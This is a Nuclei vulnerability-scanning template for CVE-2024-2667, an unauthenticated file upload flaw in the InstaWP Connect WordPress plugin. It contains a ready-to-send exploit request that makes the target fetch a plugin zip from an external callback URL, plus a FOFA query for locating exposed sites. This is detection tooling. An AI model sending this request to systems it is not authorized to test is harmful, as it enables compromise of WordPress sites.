id: CVE-2024-2667

info:
  name: InstaWP Connect <= 0.1.0.22 - Unauthenticated Arbitrary File Upload
  author: DhiyaneshDK
  severity: critical
  description: |
    The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file validation in the /wp-json/instawp-connect/v1/config REST API endpoint in all versions up to, and including, 0.1.0.22. This makes it possible for unauthenticated attackers to upload arbitrary files.
  impact: |
    Unauthenticated attackers can install and activate arbitrary WordPress plugins including vulnerable or malicious ones via the InstaWP Connect REST API endpoint.
  remediation: |
    Update InstaWP Connect plugin to version 0.1.0.23 or later.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/f6aead8d-c136-4952-ad03-86fe0f144dea?source=cve
    - https://github.com/Nxploited/CVE-2024-2667-Poc
    - https://github.com/Puvipavan/CVE-2024-2667
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-2667
    cwe-id: CWE-434
    epss-score: 0.90708
    epss-percentile: 0.99641
    cpe: cpe:2.3:a:instawp:instawp_connect:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: instawp
    product: instawp_connect
    framework: wordpress
    fofa-query: body="/wp-content/plugins/instawp-connect/"
  tags: cve,cve2024,wordpress,wp-plugin,wp,instawp-connect,intrusive,file-upload,vkev,vuln

http:
  - raw:
      - |
        POST /?rest_route=/instawp-connect/v1/config HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        api_key={{randstr}}&override_plugin_zip=http://{{interactsh-url}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"status":true'
          - '"message":'
        condition: and

      - type: word
        part: content_type
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4a0a0047304502210095d4367066e0bbf84f51c907608496a2ac046064bb83b57b6f73dc1664ef0f930220585c508d3e4f9791af7b248aa0021e70749303f3a59c855a0116a766d5a8624a:922c64590222798bb761d5b6d8e72950